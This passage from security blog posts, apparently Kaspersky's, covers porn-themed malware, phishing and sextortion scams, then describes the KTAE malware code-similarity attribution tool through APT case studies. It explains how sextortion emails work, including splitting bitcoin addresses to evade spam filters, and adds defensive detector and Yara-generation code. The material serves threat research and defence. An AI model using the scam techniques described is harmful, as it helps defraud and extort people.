The number of sites affected in 2019 remained the same as the previous year – pornhub.com and xvideos.com, both among the top three most visited porn sites according to similarweb.com statistics in 2020, were targeted in 2019. As attacks consolidated into the activity of just one family, the number of users affected also dropped by 65% from 110,000 in 2018 to 38,846 in 2019. Nevertheless, the number of attacks continued to grow, increasing by 37% from 2018 to 2019 and reaching a total of 1,169,153 attacks, showing the persistence of botnets in attacking the same users.

Overall, we can conclude that even though fewer cybercriminals demonstrated an interest in hunting credentials from porn sites, the threat is still real and focused only on the most visited sites, reflecting the cybercriminals’ understanding of the potential demand for credentials on the black market.

Mobile threats

To learn more about mobile threats related to illicit content, we checked all files disguised as porn videos or adult-content installation packages for Android in 2018 and 2019. While we still used porn tags as a filtering criterion – as we did for the analysis of PC-based threats – the methodology was slightly different. We ran 200 popular porn tags against our database of threats in order to gain the fullest insight into porn-related mobile threats. The analysis showed results for 105 tags in 2018 and for 99 tags in 2019, demonstrating that not all porn attracts cybercriminals. Even though fewer tags were used to spread malicious files disguised as porn, in 2019 the number of users attacked by porn-related malware and not-a-virus threats more than doubled, reaching 42,973 compared to 19,699 users attacked in 2018.

We also separately ran 40 ‘violent’ porn tags against the same database of detections on Android devices. The violent category included a variety of tags associated with sexual violence against another person. The hypothesis was that more unusual porn tags might demonstrate a disproportionally higher level of malicious activity. However, the results showed that these tags are hardly used for spreading malware, with 270 and 133 attacked users in 2018 and 2019 respectively.

Analysis of the types of threats distributed via such porn-related files demonstrated a slight growth in their variety – in 2018 we found 180 malware and not-a-virus threat families belonging to 20 classes of threats, while in 2019 the numbers were 203 and 20 respectively. Adware, software that’s used to show and redirect users to unwanted advertising pages, remained in first place in terms of variety, with a fifth (19%) of malicious files being AdWare installers. Not-a-virus: RiskTools and Trojans remained among the top three types of threat both in 2018 and 2019, even though their proportions have changed slightly.


Top 10 types of mobile threat that make up the variety of porn-related categories, in 2018 and 2019. Source: Kaspersky Security Network

The proportion of Trojan-Bankers, which hunt for banking cards and other payment credentials, dropped from 7% to 5%. Overall, however, we can see that the types of threat distributed under the guise of adult content has hardly changed in terms of variety.

Looking deeper into the types of threats and how widespread they are, we can see that most users have been targeted by adware detected as AdWare.AndroidOS.Agent.f. This was true for 2018 when 39.23% of attacked users were targeted by this threat, and for 2019 with 35.18% of users attacked by it. Furthermore, six of the top 10 porn-related threats for mobile users were adware in 2018 and seven in 2019. This further confirms that the popularity of adware continues to grow.


Top 10 detection names that represent porn-related categories, by the number of attacked mobile users in 2018 and 2019. Source: Kaspersky Security Network

This type of threat is typically distributed through various affiliate programs whose purpose is to earn money per installation or per download of malicious applications by victims, a method we mentioned in earlier sections.

Overall analysis of the prominence of various types of threats shows that although downloading porn-related content from untrustworthy sources typically leads to infection with adware, more serious threats, including backdoors, spyware and ransomware, can still end up on the devices of unwitting users.

Although adult dating is a topic of interest for cybercriminals (see the Phishing and spam section), creating malicious applications that pretend to be sex dating apps doesn’t appear to be worth the effort. This year we analyzed a variety of threats distributed under the guise of popular sex dating applications. Sex dating apps, unlike regular dating apps, are focused on finding a date for a sexual encounter, meaning such apps have a much clearer targeted audience.

We were interested in seeing whether cybercriminals use popular brand names of sex dating apps in order to distribute malware or not-a-virus threats. The number of attacked users, however, turned out to be minuscule – just 32 over the whole of 2019. This is many times fewer than for regular dating apps such as Bumble or Tinder, showing that malicious files under the guise of sex dating apps are rarely a source of threat to users. This could be because downloading such apps involves greater privacy concerns and is therefore carried out with more attention to the legitimacy of the source.

Our research found that malicious samples of apps used the names of the following brands: Grindr, Down Dating and Tingle. It’s important to note that the malicious software is not connected in any way to the actual sex dating apps and only uses their brand names to trick users.

Detection name                                      %
not-a-virus:UDS:AdWare.AndroidOS.MobiDash.z         55.17%
not-a-virus:HEUR:AdWare.AndroidOS.MobiDash.z        51.72%
HEUR:Trojan.AndroidOS.Hiddapp.ch                    10.34%
HEUR:Trojan.AndroidOS.Hiddapp.cg                     6.90%
not-a-virus:HEUR:AdWare.AndroidOS.Mobidash.aj        6.90%

Top 5 detection names for mobile threats pretending to be adult dating apps in 2019. Source: Kaspersky Security Network

Phishing and spam

Phishers and spammers are also not averse to using the porn theme. Our content-filtering technologies give us an insight into the kind of porn-related spam and phishing that users are targeted with, as well as enabling us to protect those users.

It’s important to note that the phishing versions of websites are not connected to the original platforms in any way. Cybercriminals copy the websites, often replicating them down to the smallest detail, making it hard for an unwitting user to tell a phishing page from an original. To make the websites appear as trustworthy as possible, fraudsters usually opt to copy the most popular platforms that are widely recognized by users, such as Pornhub.com, XNXX.com and several others. Such phishing websites are generally blocked by search engines and are therefore usually reached via phishing or spam emails, malware or malicious frames redirecting users to compromised websites or malvertising.

The most common goal of these phishing pages is to gather the personal information of users – their credentials and contact details, which can later be sold or used for malicious purposes. Certain websites employ social media authorization for access to the website – this is done to confirm that a user is over 18. Cybercriminals replicate these authorization pages so that they can get their hands on users’ social media credentials when they log in.

This phishing page replicates the authorization page to Pornhub through a popular social network. Once a user logs in, their social media credentials are stolen by the fraudsters

Pornographic phishing pages are also used to spread malware – once a user starts playing a video, they receive a notification that a video player update is required. The downloaded program, however, is in fact malware.

This phishing copy of the popular XNXX.com site mimics the legitimate website’s homepage and is practically impossible to differentiate from the original

Other phishing schemes target e-wallets and credit card credentials. In such cases the victim is lured to pornographic websites to watch a video that is only accessible if the user registers and provides their payment details.

Spam scam

For a few years we didn’t see much activity in terms of pornographic or sex-related content in spam, but then in 2019 the situation changed. Spam emails usually don’t focus on promoting pornographic content as such, but they are used to lure users to phishing sites using social engineering techniques, extort money or simply to advertise sites with explicit content.

The most common type of spam is that focusing on sex dating. Users receive emails allegedly from lonely ladies who invite them to chat on a website. The user is then directed to a new sex dating website with bots pretending to be attractive women, who then coax money from the victims for various content, such as erotic photos or premium access to the website. Cybercriminals also ask users to share their credit card data in order to ‘confirm their age’. Needless to say, this credit card data will later be used or resold on black market forums.

Emails dedicated to sex dating can either look like advertising or messages sent directly from women

This sex dating app interface shows various dialogues from bots pretending to be attractive women

Users are asked to share their credit card details that will be used to activate an allegedly free membership on the site

We have also seen the spread of spam promoting web porn games, with emails advertising platforms where users can play 18+ games, such as 3D porn arcades, and watch explicit content; these links actually do lead to genuine websites. The main purpose of these spam emails is simply to advertise the availability of such content.

The email above advertises a website hosting 3D porn games

One of the darkest and possibly most harmful types of sex-related spam is blackmail or ‘sextortion scams’, which have been used by cybercriminals for over three years. We saw the rise of such emails in 2018 with the email content becoming more and more sophisticated. The trend continued in 2019, with new variations of the scams popping up across the web.

The scheme usually works as follows: users receive emails from scammers that claim to have hacked their computers and recorded them watching porn. The emails claim that the threat actor has contact information for friends and family as well as the social media credentials of the users that the actor will use to spread a video of the victim recorded via webcam. The cybercriminal also lists the technologies he allegedly used to gather information about the user to make the email sound more convincing.

In order to lend further legitimacy, the extortionist will claim to have personal information about the user, for instance, their password. The scammer may even cite a password that is allegedly used by the victim. For this purpose, cybercriminals often make use of databases purchased on the dark web. Because users often have the same passwords for different websites, it can be easy to convince victims that their devices have been compromised, even if the password doesn’t match a specific account. Having scared the victim into believing their reputation could be ruined, the scammers demand payment in bitcoin and even provide basic instructions on how to transfer the money.

This sextortion email demonstrates how cybercriminals try to convince a victim that they have been hacked

Last year the industry also saw variations of these scams: emails were distributed in different languages, and the bitcoin wallet address was split in two so that detection systems would not identify the message as spam. Another social engineering trick – convincing the victim that the girlfriend of one of his friends was compromised and blackmailed, but refused to pay – prompts the user, out of sheer curiosity, to click on malicious attachments in the emails that then download malware. This shows that cybercriminals continue to adapt their schemes, taking into account developments in security measures and user behavior.
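One way to catch the split-address trick described above, as an added example that is not part of Kaspersky’s report and not a description of their content-filtering technology: the detector below pulls out runs of Base58 characters, joins up to three adjacent fragments, and keeps only candidates whose Base58Check checksum verifies, so ordinary words that happen to use the Base58 alphabet are rejected rather than flagged. The sample email is constructed for the example, and the address in it is derived in the code from an all-zero hash160 (the well-known burn address), not taken from any real campaign.

```python
import hashlib
import re

# Base58 alphabet used by Bitcoin: no 0, O, I or l.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58check_encode(version: int, payload: bytes) -> str:
    """Encode version byte + payload with a 4-byte double-SHA256 checksum."""
    data = bytes([version]) + payload
    raw = data + hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]
    n = int.from_bytes(raw, "big")
    digits = ""
    while n:
        n, rem = divmod(n, 58)
        digits = ALPHABET[rem] + digits
    # Each leading zero byte is represented by a leading '1'.
    leading_zeros = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * leading_zeros + digits


def base58check_valid(candidate: str) -> bool:
    """True only if the string decodes to 25 bytes whose checksum verifies."""
    n = 0
    for ch in candidate:
        idx = ALPHABET.find(ch)
        if idx < 0:
            return False
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_ones = len(candidate) - len(candidate.lstrip("1"))
    raw = b"\x00" * leading_ones + body
    if len(raw) != 25:
        return False
    data, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4] == checksum


# Runs of Base58 characters; the minimum is short so that halves of a split address are caught.
FRAGMENT = re.compile(r"[1-9A-HJ-NP-Za-km-z]{4,35}")


def find_btc_addresses(text: str, max_parts: int = 3) -> list[str]:
    """Return checksum-valid legacy (1...) and P2SH (3...) addresses found in text,
    joining up to max_parts consecutive fragments so a split address is reassembled."""
    fragments = [m.group() for m in FRAGMENT.finditer(text)]
    found = []
    for i in range(len(fragments)):
        joined = ""
        for part in fragments[i:i + max_parts]:
            joined += part
            if len(joined) > 35:
                break
            if len(joined) >= 26 and joined[0] in "13" and base58check_valid(joined):
                found.append(joined)
                break
    return found


# Constructed sample: the address is the all-zero-hash160 burn address
# (1111111111111111111114oLvT2), split across two lines the way the scam does.
SCAM_ADDRESS = base58check_encode(0x00, bytes(20))
_half = len(SCAM_ADDRESS) // 2
SAMPLE_EMAIL = f"""Subject: Your account has been hacked
I have recorded you through your webcam while you visited adult sites.
Send 900 USD in Bitcoin to my wallet within 48 hours:
{SCAM_ADDRESS[:_half]}
{SCAM_ADDRESS[_half:]}
Do not reply, this mailbox is not monitored."""


if __name__ == "__main__":
    print(find_btc_addresses(SAMPLE_EMAIL))
```

The checksum check is what makes the reassembly safe: joining arbitrary neighbouring words produces a false positive only with probability around 2^-32, so the detector can afford a permissive fragment pattern. It does not cover bech32 (bc1...) addresses, which use a different alphabet and checksum.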

The dark web and beyond – a peek into the market behind the curtain

The dark web is the go-to place when it comes to understanding how the cybercriminal market operates. Various forums are used for the sale of malware and personal data, and for the exchange of knowledge, often of a quite practical kind. They also reflect the market value of stolen personal data. The sale of data is like any other business, and the way it is organized resembles regular marketplaces, with guarantees from the sellers, a variety of choice and competitive pricing.

An example of a post made in 2019 on a forum offering stolen accounts for a very low price and providing pricing recommendations for resale

Premium adult website accounts, which we addressed in the Credential hunters section of this report, end up on dark web marketplaces where they are sold both in bulk and individually at low prices – starting from as little as US$0.50 per account. The accounts are usually resold at surface web platforms for up to US$5-10, with sellers even recommending prices for the resale of individual accounts. Furthermore, the buyers of stolen accounts often get a lifetime guarantee that the accounts will continue to work and remain accessible, with an option to replace those that become unavailable. The examples below demonstrate how widespread this practice is – on one forum alone we saw 210 offers of stolen accounts.

An example of an illegal forum that contains 210 offers of porn-related accounts for sale

Stolen accounts, somewhat ironically, are often purchased by individuals who care about their privacy and don’t want their personal information such as credit card data or email addresses revealed. Buyers often pay with cryptocurrency, thus remaining completely anonymous.

An example of an advertisement selling stolen Pornhub premium accounts on a regular forum for a low price. Buyers are offered discounts for buying in bulk

Premium porn site accounts are not the only adult content sold on the dark web and illegal forums on the surface web. A glimpse into the dark web market showed the twists and turns a data leak can take when the exposed content is sensitive. In the past year we have seen numerous cases of private adult content sites leaking content created by webcam models, along with their personal details, devastating the victims. But the creators of adult content are not the only ones at risk. While celebrities are the intended targets of such leaks, regular users may also see their private images end up on the web.

While databases of nude images are often available for free (with a donation-based support system for the publisher), some adult image content, including leaked personal images, is sold, albeit quite cheap – for as little as US$2.00 for a collection. This is the price tag cybercriminals put on the private lives of thousands of individuals, underlining a disturbing tendency that places little value on users’ personal data.

This screenshot showcases collections of nude images, both leaked and collected, sold for as low as US$2.00 per collection

This website offers to download sex tapes and nude content of various celebrities for free

Another disturbing trend we have seen on the dark market is the extension of the malware-as-a-service concept to fraud, with ready-to-use packages of content and instructions. While in the past hackers may have exchanged information on how to trick users or skim cards, some now offer their expertise in other fields, including extorting money from victims looking for sex or simply for intimate human attention.

For instance, in the example below a user offers a full sextortion package with instructions for new users. The package has been created for fooling users into believing they are talking to a real girl and as a result extorting money from them. It not only includes images and videos of a supposed model, which certainly lends more credibility to the trick, it also contains instructions on how to use it to make money – according to the ad, suitable “both for experienced and beginner user”. As a bonus the seller offers access to various porn accounts and certain gifts, and on top of that, shares information about fraud tutorials that the seller has created.

An example of an extortion package sold on the dark market

The seller goes as far as describing the value of his package and providing tutorials on how to use his product

We have seen blog posts where cybercriminals share their experience of creating and distributing various malware, including sextortion ransomware. For instance, one of them described a process for creating and distributing mobile ransomware focused on sextortion. The app would use the front-facing camera to take a picture of the user, accuse them of watching illicit content, and threaten to distribute the photograph along with screenshots of the content they were watching unless the victim paid. Sound familiar? That’s because the method has been around for years and is unlikely to go away – as long as there are unprotected and vulnerable users, there will always be someone taking advantage.

Conclusions and advice

The overview of porn-related threats allows us to draw a few substantial conclusions. While we have not seen many changes in the techniques used by cybercriminals, statistics show that this topic remains a steady source of threats. Although PC malware distribution has been dropping – a trend that we have seen lately for a variety of threats – mobile malware is on the rise. With users increasingly using mobile devices for more tasks than ever (and that includes different types of entertainment), it is likely that cybercriminals have responded to this trend. While we cannot confirm a correlation, significant changes in the number of users affected both by PC and mobile malware relating to adult content allows us to at least theorize that this is one of the reasons for the change.

Another important conclusion to draw attention to is that of abuse of privacy. While some users have taken their privacy to a new level by anonymously purchasing online accounts, others remain at more risk than ever of compromising their data. Both the leaks we have seen in the media in the past year and the availability of personal or private information on the dark market for minimal sums suggest that the risks to users are increasing. With cybercriminals able to cross-reference various leaked databases of users, they are able to make more informed decisions on who to target and how, making sextortion and scamming more effective. More than ever, users need to take serious steps to protect themselves by applying advanced security measures and educating themselves on handling their data on the web and evaluating what risks exposure entails.

To consume and produce adult content safely, Kaspersky advises the following:

For consumers:

  • Pay attention to the website’s authenticity. Do not visit websites until you are sure they are legitimate and start with ‘https’ (bear in mind that ‘https’ only means the connection is encrypted; a phishing site can have it too). Confirm that the website is genuine by double-checking the format of the URL or the spelling of the company name, and look for reviews of sites that seem suspicious;
  • If you want to buy a paid subscription to an adult content website, only purchase it on the official website. Double-check the URL of the website and make sure it’s authentic;
  • Check any email attachments with a security solution before opening them – especially from dark web entities (even if they are expected to come from an anonymous source);
  • Patch the software on your PC as soon as security updates for the latest bugs are available;
  • Do not download pirated software or other illegal content, even if you were redirected to the page from a legitimate website;
  • Check application permissions on Android devices to see what your installed apps are allowed to do;
  • Do not install applications from untrusted sources, even if they are actively advertised, and block the installation of programs from unknown sources in your smartphone settings;
  • Use a reliable security solution with behavior-based anti-phishing technologies – such as Kaspersky Security Cloud to detect and block spam and phishing attacks. The solution also incorporates the Permission Checker feature for Android that helps users identify potentially dangerous or questionable requests made by the downloaded app, and explain the risks associated with different types of common permissions.

For businesses:

  • Educate employees on the risks of reckless online behavior – both for themselves and for the business. Schedule basic security awareness training for your employees, such as Kaspersky Automated Security Awareness Platform that covers email security and internet security, among other essential practices.
June 9, 2020

Big Threats Using Code Similarity. Part 1

Today, we are announcing the release of KTAE, the Kaspersky Threat Attribution Engine. This code attribution technology, developed initially for internal use by the Kaspersky Global Research and Analysis Team, is now being made available to a wider audience. You can read more about KTAE in our official press release [here], or go directly to its info [page] on the Kaspersky Enterprise site. The road from internal tool to prototype to product took about three years. We tell the story of that trip below, throwing in a few code examples as well. However, before diving into KTAE, it’s important to talk about how it all started, on a sunny day, approximately three years ago.

May 12, 2017, a Friday, started in a very similar fashion to many other Fridays: I woke up, made coffee, showered and drove to work. As I was reading e-mails, one message from a colleague in Spain caught my attention. Its subject said “Crisis … (and more)”. Now, crisis (and more!) is not something that people appreciate on a Friday, and it wasn’t April 1st either. Going through the e-mail from my colleague, it became obvious something was going on in several companies around the world. The e-mail even had an attachment with a photo, which is now world famous:

Soon after that, Spain’s Computer Emergency Response Team CCN-CERT, posted an alert on their site about a massive ransomware attack affecting several Spanish organizations. The alert recommended the installation of updates in the Microsoft March 2017 Security Bulletin as a means of stopping the spread of the attack. Meanwhile, the National Health Service (NHS) in the U.K. also issued an alert and confirmed infections at 16 medical institutions.

As we dug into the attack, we confirmed additional infections in several additional countries, including Russia, Ukraine, and India.

Quite essential in stopping these attacks was the Kaspersky System Watcher component. The System Watcher component has the ability to rollback the changes done by ransomware in the event that a malicious sample manages to bypass other defenses. This is extremely useful in case a ransomware sample slips past defenses and attempts to encrypt the data on the disk.

As we kept analysing the attack, we started learning more; for instance, the infection relied on a famous exploit (codenamed “EternalBlue”) that had been made available on the internet through the Shadowbrokers dump on April 14, 2017 and had been patched by Microsoft on March 14. Despite the fact that the patch had been available for two months, it appeared that many companies hadn’t applied it. We put together a couple of blogs, updated our technical support pages and made sure all samples were detected and blocked even on systems that were vulnerable to the EternalBlue exploit.

Meanwhile, as everyone was trying to research the samples, we were scouting for any possible links to known criminal or APT groups, trying to determine how a newcomer malware was able to cause such a pandemic in just a few days. The explanation here is simple – for ransomware, it is not very often that we get to see completely new, built from scratch, pandemic-level samples. In most cases, ransomware attacks make use of some popular malware that is sold by criminals on underground forums or, “as a service”.

And yet, we couldn’t spot any links with known ransomware variants. Things became a bit clearer on Monday evening, when Neel Mehta, a researcher at Google, posted a mysterious message on Twitter with the #WannaCryptAttribution hashtag:

The cryptic message in fact referred to a similarity between two samples that have shared code. The two samples Neel refers to in the post were:

  • A WannaCry sample from February 2017 which looks like a very early variant
  • A Lazarus APT group sample from February 2015

The similarity can be observed in the screenshot below, taken between the two samples, with the shared code highlighted:

Although some people doubted the link, we immediately realized that Neel Mehta was right. We put together a blog diving into this similarity, “WannaCry and Lazarus Group – the missing link?”. The discovery of this code overlap was obviously not a random hit. For years, Google integrated the technology they acquired from Zynamics into their analysis tools making it possible to cluster together malware samples based on shared code. Obviously, the technology seemed to work rather nicely. Interestingly, one month later, an article was published suggesting the NSA also reportedly believed in this link.

Thinking about the story, the overlap between WannaCry and Lazarus, we put a plan together: what if we built a technology that could quickly identify code reuse between malware attacks and pinpoint the likely culprits in future cases? The goal would be to make this technology more widely available, to help threat hunters, SOCs and CERTs speed up incident response or malware triage. The first prototype of this new technology was available internally in June 2017, and we continued to work on it, fine-tuning it, over the following months.

In principle, the problem of code similarity is relatively easy. Several approaches have been tested and discussed in the past, including:

  • Calculating checksums for subroutines and comparing them against a database
  • Reconstructing the code flow and creating a graph from it; comparing graphs for similar structures
  • Extracting n-grams and comparing them against a database
  • Using fuzzy hashes on the whole file or parts of it
  • Using metadata, such as the rich header, exports or other parts of the file; although this isn’t code similarity, it can still yield some very good results

To find the common code between two malware samples, one can, for instance, extract all 8-16 byte strings, then check for overlaps. There are two main problems with that though:

  • Our malware collection is too big; if we want to do this for all the files we have, we’d need a large computing cluster (read: thousands of machines) and lots of storage (read: Petabytes)
  • Capex too small

Additionally, doing this massive code extraction, profiling and storage, not to mention searching, in an efficient way that we can provide as a stand-alone box, VM or appliance is another level of complexity.

To refine it, we started experimenting with code-based Yara rules. The idea was also simple and beautiful: create a Yara rule from the unique code found in a sample, then use our existing systems to scan the malware collection with that Yara rule.

Here’s one such example, inspired by WannaCry:

This innocent looking Yara rule above catches BlueNoroff (malware used in the Bangladesh Bank Heist), ManusCrypt (a more complex malware used by the Lazarus APT, also known as FALLCHILL) and Decafett, a keylogger that we previously couldn’t associate with any known APT.

A breakthrough in terms of identifying shared code came in Sep 2017, when for the first time we were able to associate a new, “unknown” malware with a known entity or set of tools. This happened during the #CCleaner incident, which was initially spotted by Morphisec and Cisco Talos.

In particular, our technology spotted a fragment of code, part of a custom base64 encoding subroutine, in the Cbkrdr shellcode loader that was identical to one seen in a previous malware sample named Missl, allegedly used by APT17:

Digging deeper, we identified at least three malware families that shared this code: Missl, Zoxpng/Gresim and Hikit, as shown below in the Yara hits:

In particular, the hits above are the results of running a custom Yara rule, based on what we call “genotypes” – unique fragments of code, extracted from a malware sample, that do not appear in any clean sample and are specific to that malware family (as opposed to being a known piece of library code, such as zlib for instance).
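To make the two ideas above concrete (8-16 byte code fragments checked for overlap, and “genotypes” that are filtered against clean software), here is an added example that is not KTAE or any Kaspersky code: it slides a fixed window over two constructed samples, drops every fragment that also occurs in a constructed clean corpus, reports what the samples share, and turns the shared fragments into a Yara rule. All byte strings are synthetic stand-ins, not real malware.

```python
from typing import Iterable, Set

# Window length for code fragments; the text above mentions 8-16 byte strings.
FRAGMENT_LEN = 12

# Constructed stand-ins for code sections (synthetic bytes, not real malware).
LIBRARY_ROUTINE = bytes.fromhex("558bec83ec10538b5d085657b90a000000f3a45f5e5bc9c3")
SHARED_ROUTINE = bytes.fromhex("8a0684c074123c3d740e0fb6c88a910000000088174647ebeac3")
UNIQUE_A = bytes.fromhex("6a00680000004068ff0000006a00ff1578563412")
UNIQUE_B = bytes.fromhex("33c08bff39c1760d8b0c818b0983c10483c6043bf7")

# Two "malware" samples sharing one routine, plus a "clean" file that carries only
# the library routine (think of zlib shipped inside legitimate software).
SAMPLE_A = LIBRARY_ROUTINE + SHARED_ROUTINE + b"\x90" * 4 + UNIQUE_A
SAMPLE_B = UNIQUE_B + SHARED_ROUTINE + LIBRARY_ROUTINE
CLEAN_FILES = [b"\xcc" * 16 + LIBRARY_ROUTINE + b"\xcc" * 16]


def fragments(code: bytes, n: int = FRAGMENT_LEN) -> Set[bytes]:
    """All overlapping n-byte windows of a code blob."""
    return {code[i:i + n] for i in range(len(code) - n + 1)}


def clean_index(clean_files: Iterable[bytes], n: int = FRAGMENT_LEN) -> Set[bytes]:
    """Every fragment that occurs anywhere in the clean corpus."""
    index: Set[bytes] = set()
    for blob in clean_files:
        index |= fragments(blob, n)
    return index


def genotypes(code: bytes, clean: Set[bytes], n: int = FRAGMENT_LEN) -> Set[bytes]:
    """Fragments unique to the sample: present in it, absent from clean software."""
    return fragments(code, n) - clean


def shared_genotypes(a: bytes, b: bytes, clean: Set[bytes]) -> Set[bytes]:
    """Genotypes that two samples have in common."""
    return genotypes(a, clean) & genotypes(b, clean)


def similarity(a: bytes, b: bytes, clean: Set[bytes]) -> float:
    """Share of a's genotypes that also appear in b, in percent.
    Asymmetric by design, like the per-sample percentages quoted on this page."""
    own = genotypes(a, clean)
    if not own:
        return 0.0
    return 100.0 * len(own & genotypes(b, clean)) / len(own)


def yara_rule(name: str, frags: Set[bytes], max_strings: int = 8) -> str:
    """Emit a Yara rule whose strings are the given fragments as hex byte patterns."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, frag in enumerate(sorted(frags)[:max_strings]):
        hex_bytes = " ".join(f"{b:02X}" for b in frag)
        lines.append(f"        $g{i} = {{ {hex_bytes} }}")
    lines += ["    condition:", "        any of them", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    clean = clean_index(CLEAN_FILES)
    shared = shared_genotypes(SAMPLE_A, SAMPLE_B, clean)
    print(f"{len(shared)} shared genotypes, "
          f"A->B similarity {similarity(SAMPLE_A, SAMPLE_B, clean):.1f}%")
    print(yara_rule("shared_code_example", shared))
```

On the constructed input the library windows are filtered out as clean and only the windows inside the shared routine survive, which is exactly what the generated rule then matches.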

As a side note, Kris McConkey from PwC delivered a wonderful dive into Axiom’s tools during his talk “Following APT OpSec failures” at SAS 2015 – highly recommended if you’re interested in learning more about this APT super-group.

https://www.youtube.com/watch?v=NFJqD-LcpIg

Soon, the Kaspersky Threat Attribution Engine – “KTAE” – also nicknamed internally “Yana”, became one of the most important tools in our analysis cycle.

Digging deeper, or more case studies

The United States Cyber Command, or in short, “USCYBERCOM”, began posting samples to VirusTotal in November 2018, an excellent move in our opinion. The only drawback of these uploads was the lack of any context, such as the malware family, whether it’s APT or criminal, which group uses them and whether they were found in the wild or scooped from certain places. Although the first upload, a repurposed Absolute Computrace loader, wasn’t much of an issue to recognize, an upload from May 2019 was a bit more tricky to identify. This was immediately flagged as Sofacy by our technology, in particular as similar to known XTunnel samples, a backdoor used by the group. Here’s what the KTAE report looks like for the sample in question:

Analysis for d51d485f98810ab1278df4e41b692761

In February 2020, USCYBERCOM posted another batch of samples that we quickly checked with KTAE. The results indicated a pack of different malware families, used by several APT groups, including Lazarus, with their BlueNoroff subgroup, Andariel, HollyCheng, with shared code fragments stretching back to the DarkSeoul attack, Operation Blockbuster and the SPE Hack.

Going further, USCYBERCOM posted another batch of samples in May 2020, for which KTAE revealed a similar pattern.

Of course, one might wonder, what else can KTAE do except help with the identification of VT dumps from USCYBERCOM?

For a more practical check, we looked at the samples from the 2018 SingHealth data breach that, according to Wikipedia, was initiated by unidentified state actors. Although most samples used in the attack are rather custom and do not show any similarity with previous attacks, two of them have rather interesting links:

KTAE analysis for two samples used in the SingHealth data breach

Mofang, a suspected Chinese-speaking threat actor, was described in more detail in 2016 by this FOX-IT research paper, written by Yonathan Klijnsma and his colleagues. Interestingly, the paper also mentioned Singapore as a suspected country where this actor is active. Although the similarity is extremely weak, 4% and 1% respectively, it can easily point the investigator in the right direction for further investigation.

Another interesting case is the discovery and publication (“DEADLYKISS: HIT ONE TO RULE THEM ALL. TELSY DISCOVERED A PROBABLE STILL UNKNOWN AND UNTREATED APT MALWARE AIMED AT COMPROMISING INTERNET SERVICE PROVIDERS“) from our colleagues at Telsy of a new, previously unknown malware deemed “DeadlyKiss”. A quick check with KTAE on the artifact with sha256 c0d70c678fcf073e6b5ad0bce14d8904b56d73595a6dde764f95d043607e639b (md5: 608f3f7f117daf1dc9378c4f56d5946f) reveals a couple of interesting similarities with other Platinum APT samples, both in terms of code and unique strings.

Analysis for 608f3f7f117daf1dc9378c4f56d5946f

Another interesting case presented itself when we were analysing a set of files included in one of the Shadowbrokers dumps.

Analysis for 07cc65907642abdc8972e62c1467e83b

In the case above, “cnli-1.dll” (md5: 07cc65907642abdc8972e62c1467e83b) is flagged as being up to 8% similar to Regin. Looking into the file, we spot this as a DLL, with a number of custom looking exports:

Looking into these exports, for instance, fileWriteEx, shows the library has actually been created to act as a wrapper for popular IO functions, most likely for portability purposes, enabling the code to be compiled for different platforms:

Speaking of multiplatform malware, recently, our colleagues from Leonardo published their awesome analysis of a new set of Turla samples, targeting Linux systems. Originally, we published about those in 2014, when we discovered Turla Penquin, which is one of this group’s backdoors for Linux. One of these samples (sha256: 67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502) was uploaded to VirusTotal in April 2020. A quick check in KTAE for this sample reveals the following:

Analysis for b4587870ecf51e8ef67d98bb83bc4be7 – Turla 64 bit Penquin sample

We can see a very high degree of similarity with two other samples (99% and 99% respectively) as well as other lower similarity hits to other known Turla Penquin samples. Looking at the strings they have in common, we immediately spot a few very good candidates for Yara rules—quite notably, some of them were already included in the Yara rules that Leonardo provided with their paper.

 

When code similarity fails

When looking at an exciting, brand new technology, sometimes it’s easy to overlook any drawbacks and limitations. However, it’s important to understand that code similarity technologies can only point in a certain direction, while it’s still the analyst’s duty to verify and confirm the leads. As one of my friends used to say, “the best malware similarity technology is still not a replacement for your brain” (apologies, dear friend, if the quote is not 100% exact, that was some time ago). This leads us to the case of OlympicDestroyer, a very interesting attack, originally described and named by Cisco Talos.

In their blog, the Cisco Talos researchers also pointed out that OlympicDestroyer used similar techniques to Badrabbit and NotPetya to reset the event log and delete backups. Although the intention and purpose of both implementations of the techniques are similar, there are many differences in the code semantics. It’s definitely not copy-pasted code, and because the command lines were publicly discussed on security blogs, these simple techniques became available to anyone who wants to use them.

In addition, Talos researchers noted that the evtchk.txt filename, which the malware used as a potential false-flag during its operation, was very similar to the filenames (evtdiag.exe, evtsys.exe and evtchk.bat) used by BlueNoroff/Lazarus in the Bangladesh SWIFT cyberheist in 2016.

Soon after the Talos publication, the Israeli company IntezerLabs tweeted that they had found links to Chinese APT groups. As a side note, IntezerLabs have an exceptional code similarity technology themselves that you can check out by visiting their site at analyze.intezer.com.

IntezerLabs further released a blogpost with an analysis of features found using their in-house malware similarity technology.

A few days later, media outlets started publishing articles suggesting potential motives and activities by Russian APT groups: “Crowdstrike Intelligence said that in November and December of 2017 it had observed a credential harvesting operation operating in the international sporting sector. At the time it attributed this operation to Russian hacking group Fancy Bear”…

On the other hand, Crowdstrike’s own VP of Intelligence, Adam Meyers, in an interview with the media, said: “There is no evidence connecting Fancy Bear to the Olympic attack”.

Another company, Recorded Future, decided to not attribute this attack to any actor; however, they claimed that they found similarities to BlueNoroff/Lazarus LimaCharlie malware loaders that are widely believed to be North Korean actors.

During this “attribution hell”, we also used KTAE to check the samples for any possible links to previous known campaigns. And amazingly, KTAE discovered a unique pattern that also linked Olympic Destroyer to Lazarus. A combination of certain code development environment features stored in executable files, known as a Rich header, may be used as a fingerprint identifying the malware authors and their projects in some cases. In the case of the Olympic Destroyer wiper sample analyzed by Kaspersky, this “fingerprint” produced a match with a previously known Lazarus malware sample. Here’s how today’s KTAE reports it:

Analysis for 3c0d740347b0362331c882c2dee96dbf

